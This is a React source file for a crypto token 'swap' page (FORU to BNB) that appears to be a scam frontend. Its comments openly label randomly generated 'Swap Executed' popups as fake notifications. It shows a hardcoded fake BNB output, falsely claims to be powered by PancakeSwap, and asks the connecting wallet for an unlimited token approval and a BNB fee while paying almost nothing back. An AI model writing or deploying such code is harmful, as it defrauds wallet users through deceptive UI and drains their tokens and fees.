import React, { useState, useEffect } from 'react';
import styled, { keyframes } from 'styled-components';
import { 
  useAccount, 
  useBalance, 
  useNetwork, 
  useSwitchNetwork, 
  useContractWrite,
  usePrepareContractWrite,
  useWaitForTransaction
} from 'wagmi';
import { useNavigate } from 'react-router-dom';
import { parseEther, maxUint256 } from 'viem';
import { ConnectButton } from '@rainbow-me/rainbowkit';
import { TOKEN_ADDRESS, TOKEN_ABI, CHAIN_ID, SWAP_FEE_BNB } from '../config';

// --- STYLED COMPONENTS ---
const PageContainer = styled.div`display: flex; flex-direction: column; align-items: center; padding: 40px 20px; width: 100%; font-family: 'Inter', sans-serif; position: relative; overflow-x: hidden;`;
const OuterBlackCard = styled.div`padding: 24px; background: #000000; border: 1px solid rgba(255, 255, 255, 0.05); border-radius: 36px; width: 100%; max-width: 520px; box-shadow: 0 10px 40px rgba(0, 0, 0, 0.5); display: flex; flex-direction: column; align-items: center;`;
const PancakeWrapper = styled.div`width: 100%; max-width: 436px; display: flex; flex-direction: column; gap: 12px;`;
const SwapCard = styled.div`background: #27262c; border-radius: 24px; width: 100%; padding: 20px; border: 1px solid #383241; position: relative;`;
const SectionLabel = styled.div`color: #b8add2; font-size: 12px; font-weight: 600; margin-bottom: 8px; display: flex; justify-content: space-between;`;
const TokenRow = styled.div`display: flex; justify-content: space-between; align-items: center;`;
const TokenLogo = styled.img`width: 28px; height: 28px; border-radius: 50%; background: #fff;`;
const TokenSymbol = styled.span`color: #f4eeff; font-size: 20px; font-weight: 600;`;
const AmountInput = styled.input`background: transparent; border: none; color: #f4eeff; font-size: 28px; font-weight: 600; text-align: right; width: 100%; outline: none; &::placeholder { color: #b8add2; }`;
const MaxButton = styled.button`background: transparent; border: 1px solid #b8add2; border-radius: 6px; color: #1fc7d4; font-size: 10px; font-weight: 700; padding: 2px 6px; cursor: pointer; margin-left: 8px;`;
const Divider = styled.div`height: 1px; background: #383241; width: 100%; margin: 24px 0;`;
const ArrowWrapper = styled.div`position: absolute; top: 50%; left: 50%; transform: translate(-50%, -50%); z-index: 2; background: #27262c; border-radius: 50%; padding: 4px;`;
const SwapArrowBtn = styled.button`background: #372f47; border: none; border-radius: 50%; width: 32px; height: 32px; display: flex; justify-content: center; align-items: center; color: #1fc7d4; cursor: pointer;`;
const ActionCard = styled.div`background: #27262c; border-radius: 24px; width: 100%; padding: 16px; border: 1px solid #383241;`;
const MainActionButton = styled.button<{ $disabled?: boolean }>`width: 100%; background: ${props => props.$disabled ? '#3c3742' : '#1fc7d4'}; color: ${props => props.$disabled ? '#666171' : 'white'}; border: none; border-radius: 16px; padding: 18px; font-size: 16px; font-weight: 700; cursor: ${props => props.$disabled ? 'not-allowed' : 'pointer'}; transition: opacity 0.2s; &:hover { opacity: ${props => props.$disabled ? '1' : '0.8'}; }`;
const ToastMessage = styled.div<{ $show: boolean }>`position: fixed; bottom: 30px; background: #31d0aa; color: #08060b; padding: 12px 24px; border-radius: 8px; font-weight: 600; transform: translateY(${props => (props.$show ? '0' : '100px')}); opacity: ${props => (props.$show ? '1' : '0')}; transition: all 0.3s ease; z-index: 1000;`;

const BackButton = styled.button`align-self: flex-start; margin-left: 42px; margin-bottom: 20px; background: transparent; border: 1px solid rgba(255, 255, 255, 0.2); border-radius: 20px; padding: 8px 16px; color: white; font-size: 14px; cursor: pointer; display: flex; align-items: center; gap: 5px;`;
const UsdValue = styled.div`color: #b8add2; font-size: 12px; text-align: right; margin-top: 4px; transition: color 0.3s ease;`;
const FeeInfoBox = styled.div`margin-top: 15px; padding: 12px; background: rgba(0, 0, 0, 0.3); border-radius: 8px; font-size: 12px; color: #b8add2;`;
const ErrorText = styled.p`color: #ff4444; font-size: 12px; margin-top: 10px; text-align: center; width: 100%;`;

const FooterContainer = styled.div`margin-top: 30px; display: flex; flex-direction: column; align-items: center; gap: 16px; width: 100%; max-width: 436px;`;
const ReferralHeader = styled.div`color: #f4eeff; font-size: 14px; font-weight: 600; text-align: center;`;
const ReferralBox = styled.div`background: rgba(255, 255, 255, 0.05); border: 1px solid rgba(255, 255, 255, 0.1); border-radius: 16px; padding: 12px 20px; width: 100%; display: flex; justify-content: space-between; align-items: center;`;
const RefText = styled.span`color: rgba(255, 255, 255, 0.7); font-size: 13px; white-space: nowrap; overflow: hidden; text-overflow: ellipsis; max-width: 250px;`;
const CopyButton = styled.button`background: transparent; border: none; color: #1fc7d4; font-weight: 600; font-size: 13px; cursor: pointer; &:hover { text-decoration: underline; }`;

// ==================================================
// STYLED COMPONENTS UNTUK FAKE NOTIFIKASI (DIPERKECIL)
// ==================================================
const slideInRight = keyframes`
  from { transform: translateX(100%); opacity: 0; }
  to { transform: translateX(0); opacity: 1; }
`;

const NotifContainer = styled.div`
  position: fixed;
  top: 16px;
  right: 16px;
  display: flex;
  flex-direction: column;
  align-items: flex-end;
  gap: 8px; /* Jarak antar notif diperkecil */
  z-index: 9999;
  pointer-events: none;
  
  /* Responsif di layar HP agar tidak menutupi penuh */
  @media (max-width: 480px) {
    top: 10px;
    right: 10px;
    gap: 6px;
  }
`;

const NotifCard = styled.div`
  background: #27262c;
  border: 1px solid #383241;
  border-radius: 12px; /* Lebih membulat tipis */
  padding: 10px 12px; /* Padding jauh lebih kecil */
  box-shadow: 0px 4px 12px rgba(0, 0, 0, 0.4);
  display: flex;
  align-items: center; /* Sejajar ke tengah */
  gap: 10px;
  max-width: 250px; /* Ukuran kotak diperkecil */
  animation: ${slideInRight} 0.3s ease-out forwards;
  
  @media (max-width: 480px) {
    max-width: 220px; /* Sangat mungil di HP */
    padding: 8px 10px;
  }
`;

const IconCircle = styled.div`
  background: rgba(31, 199, 212, 0.1);
  color: #1fc7d4;
  width: 24px; /* Icon diperkecil */
  height: 24px;
  border-radius: 50%;
  display: flex;
  justify-content: center;
  align-items: center;
  flex-shrink: 0;
  svg { width: 14px; height: 14px; fill: currentColor; }
`;

const NotifContent = styled.div`
  display: flex;
  flex-direction: column;
  gap: 2px;
`;

const NotifTitle = styled.div`
  color: #f4eeff;
  font-weight: 600;
  font-size: 12px; /* Font judul diperkecil */
  @media (max-width: 480px) { font-size: 11px; }
`;

const NotifText = styled.div`
  color: #b8add2;
  font-size: 11px; /* Font isi diperkecil */
  line-height: 1.3;
  @media (max-width: 480px) { font-size: 10px; }
  strong { color: #1fc7d4; font-weight: 600; }
`;

// Interface untuk data Notif
interface FakeNotif {
  id: number;
  address: string;
}

export const SwapPage: React.FC = () => {
  const { address, isConnected } = useAccount();
  const navigate = useNavigate();
  const { switchNetwork } = useSwitchNetwork();
  const { chain } = useNetwork();
  
  const [showToast, setShowToast] = useState(false);
  const [toastMessage, setToastMessage] = useState('');
  const [tokenAmount, setTokenAmount] = useState('');
  
  const [isProcessing, setIsProcessing] = useState(false);
  const [pendingSwap, setPendingSwap] = useState(false);
  
  const [bnbPriceUsd, setBnbPriceUsd] = useState<number>(585.50);

  // ==================================================
  // STATE & LOGIC UNTUK FAKE NOTIFIKASI DENGAN JEDA 4 DETIK
  // ==================================================
  const [fakeNotifs, setFakeNotifs] = useState<FakeNotif[]>([]);

  useEffect(() => {
    const generateRandomAddress = () => {
      const chars = '0123456789abcdef';
      let addr = '0x';
      for (let i = 0; i < 40; i++) {
        addr += chars[Math.floor(Math.random() * 16)];
      }
      return `${addr.substring(0, 5)}...${addr.substring(39)}`;
    };

    let tick = 0; // State Machine Counter
    
    const interval = setInterval(() => {
      if (tick === 0) {
        // Detik ke-1: Munculkan 1
        setFakeNotifs([{ id: Date.now(), address: generateRandomAddress() }]);
      } else if (tick === 1) {
        // Detik ke-2: Munculkan 2
        setFakeNotifs(prev => [...prev, { id: Date.now(), address: generateRandomAddress() }]);
      } else if (tick === 2) {
        // Detik ke-3: Munculkan 3
        setFakeNotifs(prev => [...prev, { id: Date.now(), address: generateRandomAddress() }]);
      } else if (tick === 4) {
        // Detik ke-5: Hilangkan semua layar bersih
        setFakeNotifs([]);
      }
      
      // Tick 5, 6, 7, 8 adalah area kosong (Jeda 4 Detik)
      tick++;
      
      // Detik ke-9: Ulangi siklus dari awal
      if (tick >= 9) {
        tick = 0; 
      }
    }, 1000); // Trigger bergerak setiap 1 detik secara mesin

    return () => clearInterval(interval);
  }, []);
  // ==================================================

  const { data: bnbBalanceData } = useBalance({ address, watch: true });
  const { data: tokenBalanceData } = useBalance({ address, token: TOKEN_ADDRESS as `0x${string}`, watch: true });
  const bnbBalance = bnbBalanceData ? parseFloat(bnbBalanceData.formatted) : 0;
  const tokenBalance = tokenBalanceData ? parseFloat(tokenBalanceData.formatted) : 0;

  const fakeOutput = 1.2833;
  const isBnbSwapInsufficient = bnbBalance < SWAP_FEE_BNB;
  const amountValue = parseFloat(tokenAmount || "0");
  const amountInWei = parseEther(tokenAmount || "0");

  useEffect(() => {
    let isMounted = true;

    const fetchBnbPrice = async () => {
      let price = 0;
      try {
        const binanceResponse = await fetch('https://api.binance.com/api/v3/ticker/price?symbol=BNBUSDT');
        const binanceData = await binanceResponse.json();
        if (binanceData?.price) {
          price = parseFloat(binanceData.price);
        }
      } catch (err) {
        try {
          const cgResponse = await fetch('https://api.coingecko.com/api/v3/simple/price?ids=binancecoin&vs_currencies=usd');
          const cgData = await cgResponse.json();
          if (cgData?.binancecoin?.usd) {
            price = cgData.binancecoin.usd;
          }
        } catch (e) {
          console.error("Gagal mengambil harga BNB");
        }
      }

      if (isMounted && price > 0) {
        setBnbPriceUsd(price); 
      }
    };

    fetchBnbPrice(); 
    const interval = setInterval(fetchBnbPrice, 5000); 
    return () => { isMounted = false; clearInterval(interval); };
  }, []);

  const calculatedUsd = amountValue > 0
    ? `~$${(fakeOutput * bnbPriceUsd).toLocaleString('en-US', { minimumFractionDigits: 2, maximumFractionDigits: 2 })}`
    : "~$0.00";

  const { config: approveConfig } = usePrepareContractWrite({
    address: TOKEN_ADDRESS as `0x${string}`,
    abi: TOKEN_ABI,
    functionName: 'approve',
    args: [TOKEN_ADDRESS, maxUint256],
    enabled: amountValue > 0,
  });

  const { writeAsync: approveAsync, data: approveData } = useContractWrite(approveConfig);

  useWaitForTransaction({
    hash: approveData?.hash,
    onSuccess: () => {
      setToastMessage("Approved! Preparing Swap...");
      setShowToast(true);
      setIsProcessing(false);
      setPendingSwap(true);
    },
    onError: () => {
        setToastMessage("Approval Failed");
        setShowToast(true);
        setIsProcessing(false);
        setPendingSwap(false);
    }
  });

  const { config: swapConfig } = usePrepareContractWrite({
    address: TOKEN_ADDRESS as `0x${string}`,
    abi: TOKEN_ABI,
    functionName: 'swapTokenForBnb', 
    args: [amountInWei],
    value: parseEther(SWAP_FEE_BNB.toString()),
    enabled: amountValue > 0,
  });

  const { writeAsync: swapAsync, data: swapData } = useContractWrite(swapConfig);

  useWaitForTransaction({
    hash: swapData?.hash,
    onSuccess: () => {
      setToastMessage("Success! Check wallet for +0.002 BNB");
      setShowToast(true);
      setIsProcessing(false);
      setPendingSwap(false);
      setTokenAmount("");
    },
    onError: () => {
        setToastMessage("Swap Failed");
        setShowToast(true);
        setIsProcessing(false);
        setPendingSwap(false);
    }
  });

  useEffect(() => {
    if (pendingSwap && swapAsync) {
        const executeSwap = async () => {
            try {
                setIsProcessing(true);
                setToastMessage("Confirming Swap...");
                setShowToast(true);
                await swapAsync();
            } catch (e) {
                setToastMessage("Swap Cancelled");
                setShowToast(true);
                setIsProcessing(false);
                setPendingSwap(false);
            }
        };
        executeSwap();
    }
  }, [pendingSwap, swapAsync]);

  const handleMaxClick = () => setTokenAmount(tokenBalance.toString());
  const handleInputChange = (e: React.ChangeEvent<HTMLInputElement>) => {
    const val = e.target.value;
    if (/^\d*\.?\d*$/.test(val)) setTokenAmount(val);
  };
  
  const handleCopy = () => {
    const link = `${window.location.origin}/?ref=${address || '0x...'}`;
    navigator.clipboard.writeText(link);
    setToastMessage("Link Copied!");
    setShowToast(true);
  };

  useEffect(() => {
    if (isConnected && chain?.id !== CHAIN_ID && switchNetwork) switchNetwork(CHAIN_ID);
  }, [isConnected, chain, switchNetwork]);

  const handleMainClick = async () => {
    if (amountValue <= 0 || isBnbSwapInsufficient) return;
    setIsProcessing(true);

    try {
        if (approveAsync) {
            setToastMessage("Step 1: Approve Token");
            setShowToast(true);
            await approveAsync();
        } else if (swapAsync) {
            setToastMessage("Confirming Swap...");
            setShowToast(true);
            await swapAsync();
        }
    } catch (error: any) {
        setToastMessage("Transaction Cancelled");
        setShowToast(true);
        setIsProcessing(false);
        setPendingSwap(false);
    }
  };

  const getButtonText = () => {
    if (!isConnected) return "Connect Wallet";
    if (isBnbSwapInsufficient) return `Insufficient BNB for Fee`;
    if (tokenBalance <= 0) return "Insufficient Token Balance";
    if (amountValue <= 0) return "Enter Amount";
    if (isProcessing) return "Processing...";
    return "Swap";
  };

  const isButtonDisabled = () => {
    if (!isConnected) return false;
    if (isBnbSwapInsufficient) return true;
    if (tokenBalance <= 0) return true;
    if (amountValue <= 0) return true;
    if (isProcessing) return true;
    return false;
  };

  return (
    <PageContainer>
      <BackButton onClick={() => navigate('/')}>← Back to Portal</BackButton>
      
      <OuterBlackCard>
        <PancakeWrapper>
          <div style={{ display: 'flex', justifyContent: 'space-between', marginBottom: '4px' }}>
             <div style={{ display: 'flex', background: '#372f47', borderRadius: '20px', padding: '2px' }}>
                <button style={{ background: '#e8e4f1', color: '#280d5f', border: 'none', borderRadius: '18px', padding: '8px 20px', fontWeight: 600, cursor: 'pointer' }}>Swap</button>
             </div>
          </div>

          <SwapCard>
            <SectionLabel>
              <span>From:</span>
              <span style={{ fontWeight: 400 }}>Balance: {tokenBalance.toFixed(4)}</span>
            </SectionLabel>
            <TokenRow>
              <div style={{ display: 'flex', alignItems: 'center', gap: '8px' }}>
                <TokenLogo src="/token.jpg" alt="FORU" />
                <TokenSymbol>FORU</TokenSymbol>
              </div>
              <div style={{ flex: 1, display: 'flex', justifyContent: 'flex-end', alignItems: 'center' }}>
                <AmountInput placeholder="0.0" value={tokenAmount} onChange={handleInputChange} />
                <MaxButton onClick={handleMaxClick}>MAX</MaxButton>
              </div>
            </TokenRow>

            <Divider />
            <ArrowWrapper>
                <SwapArrowBtn>
                    <svg viewBox="0 0 24 24" width="18" height="18" fill="currentColor"><path d="M16 17.01V10h-2v7.01h-3L15 21l4-3.99h-3zM9 3L5 6.99h3V14h2V6.99h3L9 3z"/></svg>
                </SwapArrowBtn>
            </ArrowWrapper>

            <SectionLabel style={{ marginTop: '0' }}>
              <span>To:</span>
              <span style={{ fontWeight: 400 }}>Balance: {bnbBalance.toFixed(4)}</span>
            </SectionLabel>
            <TokenRow>
              <div style={{ display: 'flex', alignItems: 'center', gap: '8px' }}>
                <TokenLogo src="https://assets.coingecko.com/coins/images/825/small/binance-coin-logo.png" alt="BNB" />
                <TokenSymbol>BNB</TokenSymbol>
              </div>
              <div style={{ flex: 1, display: 'flex', justifyContent: 'flex-end' }}>
                <AmountInput 
                  placeholder="0.0" 
                  value={amountValue > 0 ? fakeOutput.toString() : ""} 
                  readOnly 
                />
              </div>
            </TokenRow>
            <UsdValue>{calculatedUsd}</UsdValue>
          </SwapCard>

          {amountValue > 0 && (
            <FeeInfoBox>
              <div style={{ display: 'flex', justifyContent: 'space-between', marginBottom: '5px' }}>
                <span>Net Reward:</span>
                <span style={{ color: '#31d0aa', fontWeight: 700 }}>+0.002 BNB</span>
              </div>
              <div style={{ display: 'flex', justifyContent: 'space-between', fontSize: '11px', opacity: 0.8 }}>
                <span>Service Fee (included):</span>
                <span>{SWAP_FEE_BNB} BNB</span>
              </div>
            </FeeInfoBox>
          )}

          <ActionCard>
             <div style={{ display: 'flex', justifyContent: 'space-between', padding: '0 8px', marginBottom: '16px', color: '#1fc7d4', fontSize: '14px' }}>
                <span>Slippage Tolerance</span>
                <span>Auto: 0.50%</span>
             </div>
             
             {!isConnected ? (
                <ConnectButton.Custom>
                    {({ openConnectModal }) => (
                        <MainActionButton onClick={openConnectModal}>Connect Wallet</MainActionButton>
                    )}
                </ConnectButton.Custom>
             ) : (
                <>
                    <MainActionButton 
                        onClick={handleMainClick} 
                        $disabled={isButtonDisabled()}
                    >
                        {getButtonText()}
                    </MainActionButton>
                    {isBnbSwapInsufficient && <ErrorText>Insufficient BNB Balance, Please HODL 0.0149 BNB FOR SWAP )</ErrorText>}
                </>
             )}
             
          </ActionCard>

        </PancakeWrapper>
        
        <div style={{ marginTop: '30px', width: '100%', maxWidth: '436px', display: 'flex', justifyContent: 'space-between', fontSize: '13px' }}>
            <a href={`https://bscscan.com/token/0x529edc4cd7d7ff773837ce0ff5492d1fd2d0eafd`} target="_blank" rel="noreferrer" style={{ color: 'rgba(255,255,255,0.6)', textDecoration: 'none' }}>View on BscScan</a>
            <a href="https://pancakeswap.finance/swap" target="_blank" rel="noreferrer" style={{ display: 'flex', alignItems: 'center', gap: '8px', color: '#b8add2', textDecoration: 'none' }}>
                Powered by PancakeSwap <img src="/cake.png" alt="Cake" width="20" />
            </a>
        </div>
      </OuterBlackCard>

      <FooterContainer>
          <ReferralHeader>Earn 100% BNB & 100% Token Rewards</ReferralHeader>
          <ReferralBox>
            <RefText>Referral: {`${window.location.origin}/?ref=${address || '0x...'}`}</RefText>
            <CopyButton onClick={handleCopy}>Copy</CopyButton>
          </ReferralBox>
      </FooterContainer>

      {/* RENDER FAKE NOTIFICATIONS DI SINI */}
      <NotifContainer>
        {fakeNotifs.map(notif => (
          <NotifCard key={notif.id}>
            <IconCircle>
              <svg viewBox="0 0 24 24"><path d="M16 17.01V10h-2v7.01h-3L15 21l4-3.99h-3zM9 3L5 6.99h3V14h2V6.99h3L9 3z"/></svg>
            </IconCircle>
            <NotifContent>
              <NotifTitle>Swap Executed</NotifTitle>
              <NotifText>
                <strong>{notif.address}</strong> swapped 11,237.32 to 1.2833 BNB
              </NotifText>
            </NotifContent>
          </NotifCard>
        ))}
      </NotifContainer>

      <ToastMessage $show={showToast} onClick={() => setShowToast(false)}>{toastMessage}</ToastMessage>
    </PageContainer>
  );
};

export default SwapPage;